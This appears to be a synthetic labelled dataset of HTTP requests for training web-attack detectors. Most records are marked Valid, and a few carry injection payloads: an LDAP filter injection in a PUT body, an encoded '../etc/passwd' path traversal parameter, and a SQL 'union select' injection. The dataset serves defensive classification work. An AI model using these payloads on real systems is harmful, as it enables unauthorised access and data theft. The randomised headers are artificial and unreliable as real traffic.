Cookie2: $Version="1"
Date: Thu, 15 Apr 04 22:19:09 CET
ETag: W/"eHmW0mNcEda-3Z5u"
Expect: eprCieoo=fsdos
From: oecjtte@aJits.ch
If-Modified-Since: Sun, 02 May 10 01:03:37 UTC
If-Unmodified-Since: Mon, 09 Jun 08 18:13:11 CET
If-Match: "LcAGJuupXt_D7UZ"
If-None-Match: *
If-Range: "lpKKwTGdLlVwjDRA"
Max-Forwards: 902
MIME-Version: 8.3
Pragma: er0elw='deH'
Proxy-Authorization: Basic YWhnZGE6bmlpN1R0
Authorization: Basic amFtbUFsZGk6bW9uajV0Zw==
Range: -0327
Referer: /eafnEt/nacAOea/seya/hdoeWisq/Metfive.avi
TE: gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/0.2 (compatible; Konqueror/3.9; Win98; bv8Arau; a7ErmjOh; sa4enb0d)
UA-CPU: MIPS
UA-Disp: 2004,7271,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 022x8341
Via: 8.5 48.209.35.54, 0.3 www.y3ncsmn.css
Transfer-Encoding: gzip
Upgrade: dad/1.8, foyho2/4.1
Warning: 504 www.jecaa.jpg "whtdsrErtaeai" "Sun, 11 Sep 05 02:40:23 GMT"
X-Forwarded-For: 22.251.252.232
X-Serial-Number: 0963814403346136
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 18092
Start - Id: 30415
class: Valid
GET /iAj9qMxWG7GCE-_QgM/8m4lhegfa/1aF8pacceptwperlOwindow.open/Ggudq/RS_wget3jVDThtaccesadmin6l5tmp.htm? HTTP/1.1
Host: www.nStinkr.de
Connection: close
Accept: application/postscript;q=0.8
Accept-Charset: euc-tw;q=0.4
Accept-Encoding: *;q=0.9
Accept-Language: sp-emnn;q=0.2
Cache-Control: max-stale
Client-ip: 180.57.71.245
Cookie: ataniutiee=divyCe oaNlara;esTreml=TdsAtnwNe3d5ns9i;getcrheegu=62063688;aragoiO=522987
Cookie2: $Version="977"
Date: Sun, 02 May 04 20:00:34 CET
ETag: W/"sUhkYg9F@x81qi5"
Expect: boqlnoRo
From: wmReuit@hemuh5.fr
If-Modified-Since: Tue, 20 Apr 04 10:51:56 CET
If-Unmodified-Since: Sun, 03 Feb 08 14:59:18 CET
If-Match: "xSGfsuMbuYbCsajEIP-"
If-None-Match: "z@nZHjS_d7I1U8yAe2JF"
If-Range: *
Max-Forwards: 7203
MIME-Version: 0.2
Pragma: ofieips=rnae
Authorization: Basic dGlsaTp0bzZ5aXl1cA==
Referer: http://www.fnheorn.st/alnsa/obagi/iNeisett/0hewif3e.bin
TE: deflate,deflate;q=0.1
Trailer: Authorization
User-Agent: Mozilla/3.1 (Windows; U; Win98 4.5; rn-sd; rv:5.8.6) Gecko/82848448
UA-Disp: 1255,973,16
UA-Color: color8
UA-Pixels: 094x400
Via: 6.6 163.166.65.24:94
Transfer-Encoding: compress
Upgrade: Itrr/4.9, dhnuRy/2.8, stitY/4.6, ayczo/5.8, et7hnu/4.7
Warning: 485 87.113.145.16 "tapaxhedta" 
X-Forwarded-For: 97.116.231.157
X-Serial-Number: 17997505261977757757
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30415
Start - Id: 30661
class: Valid
GET /coa9qtSeykz/7stzV8z0/ukuuzsS@/.B9Wwpi5j.@mail/89z/wPAoD/e0v8xT0WwezCyl@/p-v.bin?5HS2=zGjn4p.maKmN&mnmocead=uuat&UbTke3ok=86695&oqftpL-betweene.7passthrum=jlibLt8jf+wi%40s+&elehmcaack=etDogdhntsb&e4areteazopim=7teC&taauizosmxtee9c=hteetns&dpzio0o=22713&aacpl1vinre0o=1753928831 HTTP/1.1
Host: www.htEuyTHdl.uk:34463
Connection: close
Accept: application/*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.1
Cache-Control: max-stale=501
Client-ip: 28.174.250.130
Cookie: ID9zHU9kI=h\between;2zplKJ=heN;tTCgsi1nErhw=iddxyy9oytEaJsi]srf
Cookie2: $Version="79"
Date: Fri, 26 Nov 04 23:18:42 GMT
ETag: "hU2jxW9l_8kAduKYw0te"
Expect: 100-continue
From: ceAnse@0hhlitFdht.fr
If-Modified-Since: Thu, 15 Oct 09 20:22:35 UTC
If-Unmodified-Since: Sat, 10 Jun 06 22:34:37 UTC
If-Match: *
If-None-Match: "RJ.SWP0OHjuN9.L6w"
If-Range: Sat, 27 Jun 09 21:45:46 GMT
Max-Forwards: 444
MIME-Version: 1.3
Pragma: yu5=nnt
Proxy-Authorization: otnae s4trl2e=Mefno
Authorization: clOg sapgrflw=cgegnb
Range: 69794-,-704
Referer: /iyomitsd.gif
TE: gzip,trailers
Trailer: Date
User-Agent: Mozilla/0.0 (Machintosh; U; PPC Mac OS X 5.6; to-he; rv:6.5.7) Gecko/47116374
UA-CPU: PowerPC
UA-Disp: 7934,865,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7462x1873
Via: FTP/7.9 www.Pslse.jpg, deoimt/2.7 193.41.150.125, 4.1 www.jrkh.jpg
Transfer-Encoding: gzip
Upgrade: eMR/0.4, Xw1Rp/0.0, t9se4/2.1, chf/5.5, oF4di/5.3
Warning: 047 www.Vcie.gif:267 "ksqsddinwgeeW" 
X-Forwarded-For: 21.250.209.193
X-Serial-Number: 62673072943112918
----: ------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 30661
Start - Id: 11722
class: Valid
GET /blmw8otihwrn/nwgV7/2r4cRtanDFME53oMKa7/nXY9e2Y1fXyB._k/iaynVeshkbraynjtiSny/DnAikLon/rRXp6PLmochaKkU/g6Yis_pXhf7/r8DW-j-gR.asmx? HTTP/1.1
Host: 100.208.248.246:00351
Connection: 8Bn9qn
Accept: */*;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 79.71.44.119
Cookie: 1lo8rihOsid=86086320;nne9vnnoiIoh=988;anyHhlaoevol=uti>;otked=76062;Cyokyoteine=nc<foasrtmpee
Cookie2: $Version="024"
Date: Sat, 23 Jun 07 08:53:55 CET
ETag: W/"l_zW--IfNE6M3bDz"
Expect: lh9t=rqsddse
From: lAuala@v9ti4o.be
If-Modified-Since: Wed, 04 Aug 04 18:14:15 CET
If-Unmodified-Since: Wed, 07 Nov 07 03:32:09 CET
If-Match: "YEWtmq8d_GwY-ZQ"
If-None-Match: *
If-Range: Thu, 01 Sep 05 12:45:47 CET
Max-Forwards: 3
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest response="c72F6f974FCDBcBE3cbCaA8bB6EBE6b5"
Authorization: Digest qop=htdbxt
Range: -63,010806-6
Referer: http://trUisa3c.st/hUncx/BonIne/titAis/hh9te1r/0umef.asmx
TE: gzip;q=0.5,gzip,gzip
Trailer: Accept
User-Agent: Mozilla/8.8 (compatible; exeaew; Linux i386; scasynih)
UA-CPU: x86
UA-Disp: 3449,787,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0846x910
Via: 5.0 17.38.213.65, 0.5 192.105.225.11
Transfer-Encoding: y2dal
Upgrade: ev2/2.0
Warning: 508 www.Wowebu.shtml "eitda3tdi4a9" "Wed, 29 Mar 06 15:01:52 GMT"
X-Forwarded-For: 129.43.76.8
X-Serial-Number: 912336
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 11722
Start - Id: 31715
class: Valid
GET /tmsK5nleznh/d1oz/ollBerAwe8/ls1A/i@g@mkTGN_o2bRnT-DlL/Gl/9Y@Y@y1Atfuc9Hz/a9ThZ84OGmZp3/55V-lV/8hn/mcH2HM.34PoI.cgi?ii=far&alinkH5cTTe0qS=xterm%7EtsasuechobO9r&6dphpUQI0OEcat=oE2d+ologsI-%40aikm&Rayoiyoeai7=9827591&va=n3kVQ4FKtP&rraRkoetsa8hf=yet6p%7EoimcrLsu&2JnexecOG79@G=ih0jsir HTTP/1.1
Host: 18.68.14.57:8
Connection: jRanrsq
Accept: audio/x-wav
Accept-Charset: utf-7
Accept-Encoding: gzip;q=0.3, gzip, deflate
Accept-Language: mri59-nnpr9t;q=0.4, wT-hwoeeZ;q=0.4, hhsa-ygisOos;q=0.3, see-uInth, 8atuiegt-h;q=0.8
Cache-Control: no-cache
Client-ip: 88.29.222.246
Cookie: Yvs2-locationDtelnet=rem2t;i83flulal=508
Cookie2: $Version="65"
Date: Mon, 16 Feb 09 15:08:41 UTC
ETag: W/"qgMm9A1yKBymjKJ"
Expect: 100-continue
From: rKtsre@uhAOD.com
If-Modified-Since: Wed, 22 Apr 09 15:41:45 UTC
If-Unmodified-Since: Tue, 13 Feb 07 05:39:18 CET
If-Match: "HdbmkXRDbUCwniQMJ"
If-None-Match: "JI1AUb6cZ.Ad5DDr1"
If-Range: Mon, 02 Mar 09 04:30:35 UTC
Max-Forwards: 1
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: tdsc jhdhva=erfp
Authorization: NTLM YnJ0dDVhcHR0bm9lYWEyaWFibmlhOWhuaGxucFJqT2lwZ2RuZTluYWdEaWJu
Range: 8-
Referer: http://sdOu.com/ntoodb/jeTba6ue/oOc2/tiTMhe.nsf
TE: trailers
Trailer: TE
User-Agent: Mozilla/0.8 (X11; U; Open BSD i386 2.4; bt-oe; rv:7.0.5) Gecko/25159179
UA-CPU: Sparc
UA-Disp: 574,324,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9430x7643
Via: FTP/4.4 229.245.199.34, HTTP/7.3 www.t9m26ht.jpg:23, HTTP/1.0 www.Drvrcwql.tiff
Transfer-Encoding: weettf; rtloe=sro9e5ef
Upgrade: toatet/2.7, hmqh/9.3
Warning: 582 63.98.99.8 "lare9ilntstaLhew" "Tue, 29 Nov 05 02:58:50 UTC"
X-Forwarded-For: 84.104.88.36
X-Serial-Number: 48619214669
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31715
Start - Id: 26540
class: Valid
GET /Otteecotupcl9i/8gT/ima1YyaTHa3j/ernnKsebcu/D1usrIH.htm?In4lveyo=3156622741&o33eee=r_l2zA3z&t6o8=926 HTTP/1.0
Host: www.yhnte.cz:80
Connection: mtdhh9yr
Accept: */*
Accept-Charset: hz-gb-2312, iso-8859-5;q=0.1, windows-1250, x-mac-chinesetrad, x-mac-arabic
Accept-Encoding: *;q=0.1
Accept-Language: 9trrwIB-eo, a1-eoXaE1iu
Cache-Control: only-if-cached
Client-ip: 9.2.33.29
Cookie: WLtb=1;FhobjectunioneI2e8=dsyTseeuaunosp;formyxp_WShSF=04126;Ihuy8itrzvcit=o@htpass=o;eeh1
Cookie2: $Version="58"
Date: Mon, 03 Dec 07 22:25:56 CET
ETag: W/"etaGvR5q5@aEoYpWCD"
Expect: 100-continue
From: 2oida@icenhE.de
If-Modified-Since: Tue, 27 Jan 09 01:16:31 CET
If-Unmodified-Since: Sun, 02 Jul 06 19:38:54 CET
If-Match: "IeFTHmmfTEm_0aDh47"
If-None-Match: *
If-Range: Thu, 15 Apr 04 18:33:27 GMT
Max-Forwards: 31
MIME-Version: 5.3
Pragma: eIep=sglbdr
Proxy-Authorization: CrcHl 7otge=ez2Tr
Authorization: NTLM cnRlbGk4YXJkaHNnTW5jRmE3c29vd3Q4dG44YWRlblRlZ1VvbzdvZWhlZzk4ZQ==
Range: -576
Referer: http://iepNtn.ch/lRnqtmh/mvene/isl9/Osedh.mp3
TE: gzip;q=0.9,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/3.2 (compatible; Konqueror/4.1; WinNT; oGeiesJ; eos5EineW; sh6x)
UA-CPU: MIPS
UA-Disp: 7109,7775,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 987x6257
Via: 7.6 178.157.196.158, eaR/2.1 186.164.129.8, FTP/4.0 www.eoyt.htm
Transfer-Encoding: gzip
Upgrade: t7nkm/4.3, ho2Bts/8.8, n0ao/6.2, teo/7.9
Warning: 248 51.93.56.9 "9mucan7xiiw9go4ettes" "Sat, 18 Mar 06 14:43:39 CET"
X-Forwarded-For: 240.213.194.27
X-Serial-Number: 693373977262
----: --------------
~~~~~: ~~~~~~~~~~

null

End - Id: 26540
Start - Id: 3676
class: Valid
GET /_dGs.sj7Htrx5.U/ei6Ql.U85P@ptR.sm.cfm?r9zwecezasts=s3O&ete5esHrqdhy=9422100&ee1rlrfnucaeu=hgtnt&Dasbhs=6&eSqsyonstoNso=2443&efufotaksiar=1066&snrlU=sYmjOGqG&aehlutqryn=%24r%25wph&o1DoDUtasa=6&lwnr8aeqeatp=054245&ueioymueweoekr=aonoeseyZehssbs&0orblsou=xeuv&jeiuawn4o=sdITmitepa%2B&qt1p@@=b%5Drhi HTTP/1.0
Host: 184.231.187.224:85768
Connection: keep-alive
Accept: video/*;q=0.8, text/*;q=0.9, application/zip;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=6
Client-ip: 184.167.170.50
Cookie: s2cre=Er0fhjlhgecvfeehM;Si1nVB=trrprocessing-instruction&6b
Date: Fri, 09 May 08 16:56:19 CET
ETag: "Lv8LbWgIruwbt1BUHz"
From: msqr@3sAneh.gov
If-Modified-Since: Thu, 22 May 08 18:01:43 CET
If-Unmodified-Since: Fri, 30 Jan 09 22:04:38 UTC
If-Range: Fri, 03 Jul 09 18:17:07 UTC
Max-Forwards: 91
Pragma: no-cache
Proxy-Authorization: a92e y0Eodhs9=hofn8E
Authorization: Digest response="ED0449dc58aeBd433180E495B5604c64"
Referer: http://www.lauxt.cz/nlTydss/igek/epuem/nahaE9/SAl3gezl.tiff
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: oWDVPB http://www.gl22rd.biz
UA-OS: Mac OS X
Via: FTP/7.3 www.Etsko.jpg, 4.9 www.mhhu.shtml:01028, 8ei4ol/3.9 191.205.51.14
Transfer-Encoding: deflate
Upgrade: eW0iue/8.2, 4ekhma/3.0, hsav/2.4, tlRmpR/8.4
Warning: 596 196.3.90.63 "Vaseasglsao" "Sun, 09 Apr 06 09:50:54 GMT"
X-Forwarded-For: 173.37.128.252
----: --------------------

null

End - Id: 3676
Start - Id: 28293
class: Valid
GET /rMxiqXEw/hdGA..4XrTiXoDJN-/etnudLne7bnrluhnnhn/t7gsoXYNO_tOznGvKwW/hfenx/dPhDZfXuwa/sdnoe4fD/nhT/FGn6A6sVscript.F24-.css?klikewohttpFXGlvar=836979&mPVao7a3j=ti_uc1Rdw&A9ynnZ=d%3Eslerhn%25svbscriptnhdD+s3%5B1&binidOFxtermOexec2Fr=sfsrnz29&ojhgibu7eeatm=3h HTTP/1.1
Host: 144.227.213.109
Connection: eoaiO
Accept: text/*;q=0.6
Accept-Charset: iso-8859-1, cp-950;q=0.1, us-ascii
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 91.16.59.134
Cookie: 5tGIseaeiIn=06;_zeRtV7.Dp58=6nes(vetfwtt
Cookie2: $Version="02"
Date: Sat, 13 Dec 08 08:55:53 GMT
ETag: W/"SI.HT8uThZ9rmizD"
Expect: 100-continue
From: b8is@ietrnb.it
If-Modified-Since: Mon, 02 Jun 08 11:21:52 CET
If-Unmodified-Since: Fri, 20 Nov 09 12:31:38 UTC
If-Match: *
If-None-Match: "44Uej_lGqM0GR5Lnt"
If-Range: *
Max-Forwards: 7
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: olaif WunoaCa=aerw
Authorization: Digest qop=auth
Range: 929-162
Referer: http://www.h7mo2.cz/dwsu.mdb
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/8.5 (Windows; U; Win98 0.3; ob-ee; rv:9.1.9) Gecko/87030655
UA-CPU: x86
UA-Disp: 359,4370,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7134x450
Via: FTP/2.6 www.e0hgf.htm, 1.2 241.7.227.217, oevYae/3.9 86.112.56.59
Transfer-Encoding: gzip
Upgrade: uan/2.4
Warning: 207 www.iRadateo.png "Hkr6Ecnpnearvdrttm" "Thu, 13 Aug 09 17:46:46 CET"
X-Forwarded-For: 48.186.166.27
X-Serial-Number: 3984354
----: ----------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 28293
Start - Id: 37524
class: LdapInjection
PUT /browhlbTzecmslPtYi/cecomtrpTEeadr9sx3d7/TJGThkTowp-r6X@/8gt5Shttpn_ougnode8s.jpg? HTTP/1.1
Content-Length: 347
Content-Language: eomh3,ch
Content-Encoding: compress
Content-Location: http://neOo.org/san4.jsp
Content-MD5: eWVlcmZhbGN0dG50bGU0aA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 30 Aug 05 18:21:19 CET
Last-Modified: Tue, 20 Apr 04 21:19:49 CET
Host: 156.32.157.10
Connection: diLnp
Accept: */*;q=0.5
Accept-Charset: iso-2022-kr, windows-874, iso-8859-4, windows-1255
Accept-Encoding: *;q=0.3
Accept-Language: seTt-mhlxoabl
Cache-Control: min-fresh=26
Client-ip: 106.155.251.0
Cookie: r73SokHQ8r=5;tehiy8hEtqe= yg ;a9s8tr7Lnnceq=6
Cookie2: $Version="192"
Date: Sat, 29 Dec 07 02:06:34 UTC
ETag: "eRBcLEPpUSsRmtpuW-pP"
Expect: 100-continue
From: nIt1h@rvrs.org
If-Modified-Since: Thu, 17 Jan 08 11:22:36 CET
If-Unmodified-Since: Thu, 22 Mar 07 01:29:52 CET
If-Match: "cwXPK.00F4rWBLp"
If-None-Match: *
If-Range: "V9jx2CQYpKH4r6HIUp"
Max-Forwards: 06
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM bmFsZnRybWs1VG1ybmVlTGh3Z2l3dDVGZDFubnNib0EwOWl3bTRoUnZOMm53aW9p
Authorization: NTLM c25xY29lbGVzZWE1UmFBdG9jNm1lZGV1RWRwbWtBZnRhbTNwa3Jh
Range: 0516-7855,069180-,334-
Referer: /hGhcn9Ir.mp3
TE: gzip;q=0.5,deflate;q=0.1,trailers
Trailer: Expect
User-Agent: Mozilla/4.4 (X11; U; SunOS sun4u 0.2; fd-iO; rv:9.4.9) Gecko/63675144
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 428x4367
Via: 8.9 www.4aitfb.tiff, 0.6 57.57.114.111:7217, 5.0 235.244.181.151
Transfer-Encoding: identity
Upgrade: c0e/0.5, ndgd/9.1
Warning: 123 www.sswne9.png "xiaoxtnnd9tipju" 
X-Serial-Number: 4606842395290054569
----: ----------------
~~~~~: ~~~~~~~~~~~~

agecegt9rl=alpmuincludeah+o/mr&nynR=)   (   |(cn=*o    'brien*  )(mail  =*o    'brien* )&par=5004805840&w1ak=lrRerpoSdro&Lg8i5exec=1fBVb3N81w&igv=Pfnifosonri&m1YV.=73199265&o5cfnErnoe8tqcx=084&ealtopdmatAasi=ots6N0zpb&prnu=6542&maHrits7n=3091&frDzRinb=T&8yeotexz9szhedt=ecetYf5Qatht6shn&eflnrb=nlowZGD@2ld&ntihlduis=lDC

End - Id: 37524
Start - Id: 27544
class: Valid
GET /iui1erx.jpg?isowoanym0swne=377730&wolh26=tiYmSJaTR4&eAbar=u&dfn5zes=vmaiaayeemfoyas1ey&xcteale8eleo=hP7bOfWC&atcrdrte=936782&craH8t=9&9ii9epcamyua=+-D&x4pel6ea7=agviO8Dnzfhaxi&otkj9eiw=e0&ttla=nv%3B%3C HTTP/1.1
Host: www.0nc4amnln.net
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: euc-tw, gb2312;q=0.9, iso-8859-7;q=0.8, windows-1250, iso-8859-9
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: min-fresh=45
Client-ip: 50.29.29.252
Cookie: GxXVCK220admin.q=988448;Y5uW=:a|oeiorn7tr9;yeq8r0c=ottsam3;O2nhincludetelnet=8765496
Cookie2: $Version="703"
Date: Fri, 12 Mar 04 15:27:48 GMT
ETag: W/"BtM9vVhIPumTKpud@Fl@"
Expect: 100-continue
From: ru4em6@gcCndrd.cz
If-Modified-Since: Wed, 16 Apr 08 02:27:40 GMT
If-Unmodified-Since: Mon, 11 Sep 06 08:26:57 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2596
MIME-Version: 4.1
Pragma: taako4hr=ftaje
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic YXNhMnRuOmRseXc=
Range: -57147,586891-,-6
Referer: http://foRitEJ.fr/eAan/teap/so2b/yhca.bin
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/7.1 (X11; U; Linux i386 8.1; ir-ix; rv:3.8.6) Gecko/55498447
UA-CPU: PowerPC
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 412x989
Via: HTTP/0.0 77.223.143.196
Transfer-Encoding: compress
Upgrade: p9oeKS/3.3, hrTbcn/5.9, it5rl/2.1
Warning: 807 www.tHT4nsBw.tiff "eatatio9t9Iq3" 
X-Forwarded-For: 224.28.160.220
X-Serial-Number: 03769
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27544
Start - Id: 31190
class: Valid
GET /pruoebMa/tPUp/eil/hX9o7.Ky1g0/eeN@C5ALQLP/rG9l1UfKy5OexGk8J.css?eqddahixt9nbuil=iadtp1Inul&hctlanrcfm7veRs=UttmlorSe&vdTtetCeNe=818282689&irtnsll2i4e48ut=h.eJSjMc&nQoem=+&U0el=fatnSkwSfNur&iT1lofa=Alaiieplo&uaidae=444961&sitiot=2050298&otonas1xciris5o=r1V_%40B3NPMrQ HTTP/1.0
Host: www.fwod8eaa.be:55178
Connection: dl1i5nt
Accept: application/*
Accept-Charset: euc-jp;q=0.2, x-mac-japanese;q=0.2, x-mac-greek;q=0.4
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 145.210.98.117
Cookie: etedkdeetatp7h6=8
Cookie2: $Version="19"
Date: Mon, 14 Feb 05 13:42:30 GMT
ETag: W/"OR8rN3ifRxFoSfh@FN"
Expect: 100-continue
From: 2pun@ildgulxsU.uk
If-Modified-Since: Sun, 11 Jan 09 23:04:10 UTC
If-Unmodified-Since: Wed, 24 Feb 10 07:27:30 CET
If-Match: *
If-None-Match: "Ee9BY8Rrd52Kwm4pd8"
If-Range: *
Max-Forwards: 912
MIME-Version: 7.9
Pragma: e8='t'
Proxy-Authorization: t31q4h eigtbotb=ilotn
Authorization: Basic b2xtUnI6cjRoVzI=
Range: 487-253698,1-,198-1
Referer: /mez4ecta/nwal.swf
TE: trailers,chunked;q=0.9
Trailer: Expect
User-Agent: Mozilla/5.5 (Windows; U; Windows NT 8.7; rt-9a; rv:2.3.6) Gecko/64277575
UA-CPU: StrongARM
UA-Disp: 106,058,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3376x378
Via: 7.7 63.28.63.5, 2.0 87.33.179.35
Transfer-Encoding: deflate
Upgrade: eulede/1.2, upIa/0.2, nidt/3.1, e6Ne/6.8
Warning: 628 7.107.154.223 "19aoiihha" 
X-Forwarded-For: 193.229.38.157
X-Serial-Number: 251100
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31190
Start - Id: 46236
class: PathTransversal
GET /zgiI.nvUwi/aORjhWJgvR/@OscriptFdiviD/rmts/iVRpLc2lsoB3v8/5astatnc3eaifmreaymi/t0K4e.i@iEb/eydt8s5eDe5rtre/YRiXd5ztSZTqid/btc7Ja0zRwbCUPE/kesc.js?s3rxcseGq=tX-&aSi=2%3D%28o&doIo=6xH2oXY8&ttdTTstu=tte&d4zsdpl=hnstSft1&hiSh=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd&VXOIxT7=ni23rvrEeyodn8z5&ninrh=ebbR4IRoata&dxo=sijta&swilnhi4ad=carre&QPmYBJPC@l=nuGh6&.e0YWuoreIK=ttatiTaEsbbam4cTt&jlrE6nelAk=ehwme%28L&2Binputselect=105770 HTTP/1.1
Host: 9.38.43.93
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek;q=0.6, windows-1253;q=0.1
Accept-Encoding: deflate;q=0.3
Accept-Language: *;q=0.3
Cache-Control: max-age=401
Client-ip: 239.42.171.202
Cookie: hta=792;9pr8ctgds3eh=sWu&m(;nx=qSev >klc
Cookie2: $Version="8"
Date: Fri, 25 Jan 08 10:02:31 CET
ETag: W/"yMpHQWskc4VwTC_CTlsa"
Expect: eoetAt
From: eftra@neleobejy.com
If-Modified-Since: Mon, 16 May 05 16:44:28 GMT
If-Unmodified-Since: Sun, 12 Jun 05 11:08:16 UTC
If-Match: "sbc94y7.K7rZN.IEdv"
If-None-Match: *
If-Range: "obeLxAKivl4.Yg2Y"
Max-Forwards: 07
MIME-Version: 1.9
Pragma: suefnsTl=sRrl2dms
Proxy-Authorization: NTLM Y0xkbm54c2t5dGV3Y3JucGllb3NIYW55RWlpdWVucm5hdGV0c2VndWhlc21yb3Q=
Authorization: NTLM aWlvNG5lYXJzMmlvZGl0bmNsdXRhbWFIdTFpYWlwYW1vZWJlYWRuMG5kczg=
Range: 173-
Referer: /najexh/jis4/ei4gtfrH/Cey3iny/ebr2a6i.cgi
TE: deflate,gzip;q=0.8,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/3.6 (Windows; U; WinNT 1.3; tt-ix; rv:3.7.2) Gecko/76142686
UA-CPU: 68000
UA-Disp: 3006,9406,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7340x8822
Via: HTTP/5.2 www.xZuTo.css
Transfer-Encoding: compress
Upgrade: Sdb/4.1
Warning: 061 www.aomelt.jpeg "e3tta" "Tue, 23 Jan 07 20:12:20 GMT"
X-Forwarded-For: 29.166.94.55
X-Serial-Number: 79986231728889
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46236
Start - Id: 41588
class: SqlInjection
GET /ilobeofmxater/.9aEQUv0PMX/dropJdropix9H-t6Lz/K3NbrcpU8QPDJvXyw/dRsXZokeFY/e6w/t46lzQII1ioGjgT/oQVWS1/SAr/ile.sh?phat=%27+union+++select+++sum%28ds%29+++from++agasq--&bbimIc4obeh2=dioupdateoufma&tueE=z++inaioittt6&e9Ei=796343356&yuy=3356547&t2omnHaid=omceratac6 HTTP/1.0
Host: 184.93.213.65:80
Connection: orfn
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: identity, compress;q=0.0, gzip
Accept-Language: ul6-i, r-tHE, al-9q, 9Nmsme-usd;q=0.6, ktr-A;q=0.8
Cache-Control: max-age=7
Client-ip: 38.173.11.46
Cookie: eo=i2P-UuvC_H
Cookie2: $Version="8"
Date: Tue, 12 Feb 08 04:00:11 GMT
ETag: W/"W0@RJky9TsVAqhWET"
Expect: 100-continue
From: xwfji@6eera.be
If-Modified-Since: Tue, 13 Jul 04 16:18:48 CET
If-Unmodified-Since: Tue, 02 May 06 21:32:11 CET
If-Match: "WK3pCo@36pI6kQ3w"
If-None-Match: *
If-Range: Sun, 31 Jul 05 12:02:03 UTC
Max-Forwards: 0
MIME-Version: 6.8
Pragma: Dte6eoa=ooIoouer
Proxy-Authorization: iIehv ce1Orilo=oaerTe0
Authorization: Digest nonce
Range: 572-0
Referer: /IipnfagN/DlepDoew.rar
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/5.7 (compatible; gehtsk; Open BSD i586; aer0Iosmyg)
UA-CPU: StrongARM
UA-Disp: 989,4955,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3931x2579
Via: 5.3 www.alerninY.gif
Transfer-Encoding: compress
Upgrade: rtu9j/1.3, ayt1st/7.1, iEp/9.8
Warning: 258 www.ai0cAey.jpg "lIihOld" "Mon, 28 Jul 08 15:46:13 CET"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41588
Start - Id: 6289
class: Valid
PUT /4r/rvI/z4/aO8GntGmjgtDEEc/tchc/ZPk@zKyYvbscriptPXWI/laeo0dfestR/oherd3tteoo7e/3Lo/encrnls.png? HTTP/1.1
Content-Length: 284
Content-Language: Tesr,oeono8
Content-Encoding: gzip
Content-Location: http://www.wrmtc.cz/wenA/oiic5lTb/SobnQs.asp
Content-MD5: NXRyYXBhbWg4bmUwYWRldA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 Sep 09 06:18:40 UTC
Last-Modified: Tue, 04 Jan 05 05:07:05 GMT
Host: www.wB5i.de:80
Connection: keep-alive
Accept: video/*;q=0.7
Accept-Charset: x-mac-japanese;q=0.7
Accept-Encoding: *
Accept-Language: ehl6kd-hmtk1nh;q=0.7
Cache-Control: no-store
Client-ip: 221.191.241.201
Cookie: Gid=zl@6
Cookie2: $Version="5"
Date: Fri, 19 Feb 10 23:03:09 CET
ETag: "oxEd@SScH6-wK-wrZrt"
Expect: 100-continue
From: ueos@tseotr.biz
If-Modified-Since: Sun, 27 May 07 03:40:11 UTC
If-Unmodified-Since: Wed, 26 Jan 05 15:03:07 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 922
MIME-Version: 8.4
Pragma: a='phe'
Proxy-Authorization: Basic ZGlpcm1uc3Q6eG5zaGxtaA==
Authorization: NTLM QWx5RGtpbmhvOTJybnR0cnRhZmR3NnRnYXNodHR0am9lYTJvdHNFcEU1c29VYQ==
Range: 10-,-849357
